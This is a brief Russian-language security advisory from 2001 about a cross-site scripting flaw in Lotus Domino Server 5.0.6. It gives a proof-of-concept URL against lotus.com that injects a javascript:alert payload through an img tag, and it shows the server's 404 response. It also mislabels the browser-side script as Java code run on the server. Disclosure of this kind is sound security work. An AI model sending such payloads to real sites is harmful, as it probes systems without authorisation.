Security Lab

уязвимость cross-site scripting в Lotus Domino Server 5.0.6

Дата публикации:02.07.2001
Дата изменения:17.10.2006
Всего просмотров:1656
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Для исполнения Java кода на сервере наберите следующий URL:

http://www.lotus.com/home.nsf/<img%20src=javascript:alert(document.domain)>



В результате чего сервер выдаст:

Error 404

HTTP Web Server: Couldn't find design note - ******